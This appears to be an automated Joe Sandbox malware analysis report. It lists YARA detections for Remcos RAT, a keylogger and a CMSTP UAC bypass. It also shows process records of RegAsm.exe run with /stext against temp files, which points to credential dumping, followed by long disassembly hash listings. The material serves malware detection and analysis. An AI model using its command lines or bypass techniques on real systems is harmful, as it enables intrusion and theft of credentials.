                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4471996980.00000000013EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4474275239.0000000002D4E000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4471996980.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:false

                                                              General

                                                              Target ID:12
                                                              Start time:05:36:16
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\icthiyu"
                                                              Imagebase:0xa50000
                                                              File size:65'440 bytes
                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:13
                                                              Start time:05:36:16
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\swyajqfles"
                                                              Imagebase:0x120000
                                                              File size:65'440 bytes
                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:14
                                                              Start time:05:36:16
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\swyajqfles"
                                                              Imagebase:0x630000
                                                              File size:65'440 bytes
                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:15
                                                              Start time:05:36:16
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vzdkjbynsalyk"
                                                              Imagebase:0x620000
                                                              File size:65'440 bytes
                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Executed Functions

                                                                Function 062E0FE7 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000003.2039328308.00000000062E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_3_62e0000_mshta.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                • Instruction ID: d773bc0d6d4d12d09e7d1d49dd21189dc494b8755427c2b85b4be44483d0d9d4
                                                                • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                • Instruction Fuzzy Hash:
                                                                Function 062E0FCF Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000003.2039328308.00000000062E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_3_62e0000_mshta.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                • Instruction ID: d773bc0d6d4d12d09e7d1d49dd21189dc494b8755427c2b85b4be44483d0d9d4
                                                                • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                • Instruction Fuzzy Hash:
                                                                Function 062E0FDF Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000003.2039328308.00000000062E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_3_62e0000_mshta.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                • Instruction ID: d773bc0d6d4d12d09e7d1d49dd21189dc494b8755427c2b85b4be44483d0d9d4
                                                                • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                • Instruction Fuzzy Hash:
                                                                Function 062E0FD7 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000003.2039328308.00000000062E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_3_62e0000_mshta.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                • Instruction ID: d773bc0d6d4d12d09e7d1d49dd21189dc494b8755427c2b85b4be44483d0d9d4
                                                                • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                • Instruction Fuzzy Hash:

                                                                Executed Functions

                                                                Function 04EA4BB0 Relevance: 2.0, APIs: 1, Instructions: 491COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2119675467.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4ea0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ad22256d3b4bb318611584fd5f55fbc070eabe30ca8076d38ac2811c03ff6aa5
                                                                • Instruction ID: 2b76ec88c0bd28ac7a2cf5dc7259a55291e5690cbcc22a36c66f75c708ee9c97
                                                                • Opcode Fuzzy Hash: ad22256d3b4bb318611584fd5f55fbc070eabe30ca8076d38ac2811c03ff6aa5
                                                                • Instruction Fuzzy Hash: 35222774A00219AFCB05CF98D984A9EFBB2FF88314F248559E805AB365C775BD91CB90
                                                                Function 07C01178 Relevance: 2.9, Strings: 2, Instructions: 440COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2138709012.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_7c00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: tP]q$tP]q
                                                                • API String ID: 0-145478062
                                                                • Opcode ID: d6265ed35b8bc7f10dbac0f24eb8b2dab4198ae5b3a6e55e6394032b0da87454
                                                                • Instruction ID: 40c1aef985554641067a044e4b1a0337b2b7f138be80267a79ef378792654e00
                                                                • Opcode Fuzzy Hash: d6265ed35b8bc7f10dbac0f24eb8b2dab4198ae5b3a6e55e6394032b0da87454
                                                                • Instruction Fuzzy Hash: E2F1E1B5B00209AFCB149F6DC880A6EFBE6FB85B10F188459E9459B390DA71DD41C7E1
                                                                Function 07C004F8 Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2138709012.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_7c00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: tP]q$tP]q
                                                                • API String ID: 0-145478062
                                                                • Opcode ID: eb23a6c79528d0e35eb235d81430ea9776cd03fcf6acb4c4c4c4b6843f628b0a
                                                                • Instruction ID: 5ef63d453d9a2af374fead769cf7e418234595237cb398a4c2368d85d20ed865
                                                                • Opcode Fuzzy Hash: eb23a6c79528d0e35eb235d81430ea9776cd03fcf6acb4c4c4c4b6843f628b0a
                                                                • Instruction Fuzzy Hash: D75146B1B04314AFC7249B68985076ABBE6EFC5B10F15845AE988DF3D1CA31DD81C3E1
                                                                Function 04EA1A30 Relevance: 1.6, APIs: 1, Instructions: 68filenetworkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 04EA51C9
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2119675467.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4ea0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: DownloadFile
                                                                • String ID:
                                                                • API String ID: 1407266417-0
                                                                • Opcode ID: 11e92446e30955ae85125fdbb3aa8f2e79475216a9f2a9282b4bfcfb28ace414
                                                                • Instruction ID: ad2cd65a87468c592c37ee3ee7ca2712e4f042e46920d0a9fd53cb3fcb415999
                                                                • Opcode Fuzzy Hash: 11e92446e30955ae85125fdbb3aa8f2e79475216a9f2a9282b4bfcfb28ace414
                                                                • Instruction Fuzzy Hash: 1C21D5B5D01659AFCB00CF99D984AEEFBB4FB58314F10851AE918A7210D375AA54CBA0
                                                                Function 07C0115C Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2138709012.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_7c00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: tP]q
                                                                • API String ID: 0-2175968468
                                                                • Opcode ID: d39f1a99a9997e3df8e4ca38eee88734256b5318d9d90bd08e3b9fc1f46a174e
                                                                • Instruction ID: 0178679d54197a8ee527b86f5bb63743a6062ee6e871fd101a9463b06de33ab4
                                                                • Opcode Fuzzy Hash: d39f1a99a9997e3df8e4ca38eee88734256b5318d9d90bd08e3b9fc1f46a174e
                                                                • Instruction Fuzzy Hash: 6F919DB4A10609AFCB18CF59C580B6DF7F2FB84B10F198459E9469B390DA31ED41CBD1
                                                                Function 0345D005 Relevance: .0, Instructions: 47COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2118019534.000000000345D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0345D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_345d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 18f545633d9a773b604beb85d0b68f6762ff396e757da13bdeb0c5cbc733a1d4
                                                                • Instruction ID: 07ff3ae37fb6e82c4eb790c932406be95b3bad3e8bc780ced684e045df613325
                                                                • Opcode Fuzzy Hash: 18f545633d9a773b604beb85d0b68f6762ff396e757da13bdeb0c5cbc733a1d4
                                                                • Instruction Fuzzy Hash: 9801696280D3C09FD7128B258C84652BFA8EF43624F0D84DBEC988F2A7C2695C45C776
                                                                Function 0345D01D Relevance: .0, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2118019534.000000000345D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0345D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_345d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a59edd28baf731ad40689aeb3132f80e545067acccecec1fb8c337071746a930
                                                                • Instruction ID: 1bf1b2a55a0326dbef71f92afc64e20e3d417d44b96c83d776a12b2fc6775650
                                                                • Opcode Fuzzy Hash: a59edd28baf731ad40689aeb3132f80e545067acccecec1fb8c337071746a930
                                                                • Instruction Fuzzy Hash: BA01D432C053009AD720CA19CD84B67BF9CEF46728F18C46AFD590E247C2799842C6B9

                                                                Non-executed Functions

                                                                Function 07C00B70 Relevance: 6.4, Strings: 5, Instructions: 167COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2138709012.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_7c00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$4']q$X=Jl$$]q$$]q
                                                                • API String ID: 0-1729112259
                                                                • Opcode ID: 438b1d061647e94973839e12c84a71d875522af0ad16f402fba6176ad8e5c109
                                                                • Instruction ID: 3ab346226c0fe0704b01318d9fc6d2c5ea02323bea6ecdc336797c125b271c60
                                                                • Opcode Fuzzy Hash: 438b1d061647e94973839e12c84a71d875522af0ad16f402fba6176ad8e5c109
                                                                • Instruction Fuzzy Hash: 805134B1B043068FCB248F2994947AABBF5EF82310F16846BC845CB295DB35D985C7E2
                                                                Function 07C00080 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2138709012.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_7c00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$4']q$$]q$$]q
                                                                • API String ID: 0-978391646
                                                                • Opcode ID: c50c3fb8f7932262cf19fdd3d2b45f54f3db77f7e8769a4ae0adae4ed1bd3614
                                                                • Instruction ID: 407ce01f4d8e06d5e0c3c2feee99cfa1d1ec8b4ec1744c3f44e55e1362dbc97f
                                                                • Opcode Fuzzy Hash: c50c3fb8f7932262cf19fdd3d2b45f54f3db77f7e8769a4ae0adae4ed1bd3614
                                                                • Instruction Fuzzy Hash: 09018F6170D3950FC72B16292C7022A6FB66F8396032B45D7C4C0DF2E7C9694E8683E3

                                                                Executed Functions

                                                                Function 042329F0 Relevance: .2, Instructions: 207COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2060426178.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_4230000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d23c187fa4c9bbf37fb74aee6808f79be5e3f3307c4859b86d7f8127082f98e7
                                                                • Instruction ID: 8a0664242946edf52eae1af18cffb3b4546e86985d6764f974ed5fc41f6c5591
                                                                • Opcode Fuzzy Hash: d23c187fa4c9bbf37fb74aee6808f79be5e3f3307c4859b86d7f8127082f98e7
                                                                • Instruction Fuzzy Hash: 68918AB4A00205DFCB15CF59C594AAEFBB1FF48311B258999D815AB3A5C735FC81CBA0
                                                                Function 070F1CC5 Relevance: .1, Instructions: 133COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2065861611.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_70f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 74dba3c54dfda0e603612f09d2ffb49907ea28b52ea50413fe67cf24b5380c85
                                                                • Instruction ID: c11f5a4905caa40af8a383a11f60089171c16d1df41730e896ae492d1901890a
                                                                • Opcode Fuzzy Hash: 74dba3c54dfda0e603612f09d2ffb49907ea28b52ea50413fe67cf24b5380c85
                                                                • Instruction Fuzzy Hash: 6A41CCB1B00258CBCB15E76C9561ABEBBF6DFD2710B14856BC7018F755CA32C941C3A2
                                                                Function 04234C20 Relevance: .1, Instructions: 131COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2060426178.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_4230000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ee03cfd3e9b304f915b0703a416450319c5ada766d123d3a45da04c7ca86a0c4
                                                                • Instruction ID: de43fe0b5ff9a8ea209ed303e73f49faf6a3baf0b906cb9f3bf154affe10882f
                                                                • Opcode Fuzzy Hash: ee03cfd3e9b304f915b0703a416450319c5ada766d123d3a45da04c7ca86a0c4
                                                                • Instruction Fuzzy Hash: E341877490E3D59FC703DB3C886199A7FB4AF47210B0944DBC094CF2A3D629E849CBA5
                                                                Function 04232B00 Relevance: .1, Instructions: 106COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2060426178.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_4230000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d2fa37113a9efe1d5ffd4bc7d2421bc581048fe99223a8b15edb9f6064d31ce8
                                                                • Instruction ID: 5db86e840387da60b14cee50833fb993d26f1c622761f947f53f42832f9bccc0
                                                                • Opcode Fuzzy Hash: d2fa37113a9efe1d5ffd4bc7d2421bc581048fe99223a8b15edb9f6064d31ce8
                                                                • Instruction Fuzzy Hash: BC4146B4A10505DFCB09CF59C198AAEFBB5FF48311B2185A9D815AB364C732FC91CBA0
                                                                Function 04234C10 Relevance: .1, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2060426178.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_4230000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 37ec607d5a2cd468c98168bf3895434bfe544042fdf0a675dfce4ebc68e7f387
                                                                • Instruction ID: 973af9ceb1d50e653c524f6ddf568be2fabcd83138ea865f9654d04c8a7f8a25
                                                                • Opcode Fuzzy Hash: 37ec607d5a2cd468c98168bf3895434bfe544042fdf0a675dfce4ebc68e7f387
                                                                • Instruction Fuzzy Hash: E3211AB4A042499FCB01DFA8D5909AEBBF1FF8A310B158599D845EB362C335EC45CBA1
                                                                Function 0292D01D Relevance: .0, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2059952995.000000000292D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0292D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_292d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1b3f619ba4cd9859709a333f60ea2d120352b6dbf4025b509f8c5cc868a19d7d
                                                                • Instruction ID: 1556e55ce923a14a2ae7284705b12a640447de93a9f384f57c626eef7c3b4f92
                                                                • Opcode Fuzzy Hash: 1b3f619ba4cd9859709a333f60ea2d120352b6dbf4025b509f8c5cc868a19d7d
                                                                • Instruction Fuzzy Hash: C4012B31045310DAE7208E15CD84B67FFDCEF45324F18C429ED484B25AC3799849C6F1
                                                                Function 0292D006 Relevance: .0, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2059952995.000000000292D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0292D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_292d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7a9cade3b8dcc0d4b295e9860f041a1464957d9f76c880af545e7987b97a89ed
                                                                • Instruction ID: 8c596acb02706848de6d9d0933aeb7f0507b092018d0cc353596f4e834c1b8e3
                                                                • Opcode Fuzzy Hash: 7a9cade3b8dcc0d4b295e9860f041a1464957d9f76c880af545e7987b97a89ed
                                                                • Instruction Fuzzy Hash: E401527104E3D09ED7128B258C94756BFB8DF47224F1DC1DBD9888F1A7C2695849C772

                                                                Non-executed Functions

                                                                Function 070F0FE0 Relevance: 7.7, Strings: 6, Instructions: 192COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2065861611.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_70f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: tP]q$tP]q$$]q$$]q$$]q$$]q
                                                                • API String ID: 0-656377573
                                                                • Opcode ID: 6373ac83ff44f010ece424e19dc65609ac1a64cea47aaeb67f41e7324dbc22eb
                                                                • Instruction ID: 36c03abb5eec6434e23e954d14abdfe31107506b8e55c9cbe06af7aa9f72c348
                                                                • Opcode Fuzzy Hash: 6373ac83ff44f010ece424e19dc65609ac1a64cea47aaeb67f41e7324dbc22eb
                                                                • Instruction Fuzzy Hash: 36518A7170434ADFDB644B698810B6BBFF6BF82711F28866BE644CB381CA71C840C3A1
                                                                Function 070F1E50 Relevance: 5.4, Strings: 4, Instructions: 404COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2065861611.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_70f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$4']q$4']q$4']q
                                                                • API String ID: 0-1785108022
                                                                • Opcode ID: 2cd6ee0eec6ef984642b7dcef51b91f76d31c5f6c4093e4d995807cf5ea9cc38
                                                                • Instruction ID: 24a650dc4ab0c3981be2fa95cd93886118c2acf2350afc2fa497837f486ad83f
                                                                • Opcode Fuzzy Hash: 2cd6ee0eec6ef984642b7dcef51b91f76d31c5f6c4093e4d995807cf5ea9cc38
                                                                • Instruction Fuzzy Hash: 81D156B170435ADFCB158B6888107AEBFE6AFD2721F14817BD605CF682DB318985C7A1
                                                                Function 070F3228 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2065861611.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_70f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $]q$$]q$$]q$$]q
                                                                • API String ID: 0-858218434
                                                                • Opcode ID: 0e938935ab7c2490f57a03d686bfe1811570db1f974e91084b6d59370067e903
                                                                • Instruction ID: 386e859716afeb8a61d41ceb417f319be1158b0930beee9c681f4cfa47f7d0d0
                                                                • Opcode Fuzzy Hash: 0e938935ab7c2490f57a03d686bfe1811570db1f974e91084b6d59370067e903
                                                                • Instruction Fuzzy Hash: C02138B13143165BDBB8556ECC41B2BFBDAAFC1B20F64862ADA45CB781DD36C8418361
                                                                Function 070F0315 Relevance: 5.0, Strings: 4, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2065861611.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_70f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$4']q$$]q$$]q
                                                                • API String ID: 0-978391646
                                                                • Opcode ID: d796f9eff4ba6153d0b25e1097d3dd677d10da17ee1fe0ad086e6f6024bf29fe
                                                                • Instruction ID: e856fea60d832167f0041d922becfd8f36a5333e864d6958575afaab4d31b4aa
                                                                • Opcode Fuzzy Hash: d796f9eff4ba6153d0b25e1097d3dd677d10da17ee1fe0ad086e6f6024bf29fe
                                                                • Instruction Fuzzy Hash: D6F022713083129FC72A012D2C709BA6FEE9FC2E20329469BD541DB696CE264D4683E7

                                                                Executed Functions

                                                                Function 0345D005 Relevance: .0, Instructions: 47COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2352618519.000000000345D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0345D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_345d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 59eda168685bca67631be4cd8c7f76d800994e898fcff93e7a4a67c3543e3790
                                                                • Instruction ID: 77cf049f07f2e05650cbcb802adcd61cd68b81dee17ebba994cf3ece0e921b9b
                                                                • Opcode Fuzzy Hash: 59eda168685bca67631be4cd8c7f76d800994e898fcff93e7a4a67c3543e3790
                                                                • Instruction Fuzzy Hash: 4B01696280D3C49FD7128B258D84652BFA8EF43624F0D84DBEC888F2A3C2695C45C776
                                                                Function 0345D01D Relevance: .0, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2352618519.000000000345D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0345D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_345d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c7d50ce56f974f11967ad3902aff425c51c7630664690cf2a9cb1af4a32d6d66
                                                                • Instruction ID: 6895204963de7b531b12e7f27049a83fb96269ff877e8ece5dd54cc53834a405
                                                                • Opcode Fuzzy Hash: c7d50ce56f974f11967ad3902aff425c51c7630664690cf2a9cb1af4a32d6d66
                                                                • Instruction Fuzzy Hash: A4018472C053449AD720CA15CD84B67BF9CEF46728F18C46AFD585E247C2799842C6B9
                                                                Function 04D23006 Relevance: .0, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2353986134.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_4d20000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: de3058ee5617e1b82d8747034bb904958f99e4200fffa83312dc504914eefb81
                                                                • Instruction ID: b8ff22468a1fbcc31f7d2dffbc495f5cb30179222646cab36457f03a26894755
                                                                • Opcode Fuzzy Hash: de3058ee5617e1b82d8747034bb904958f99e4200fffa83312dc504914eefb81
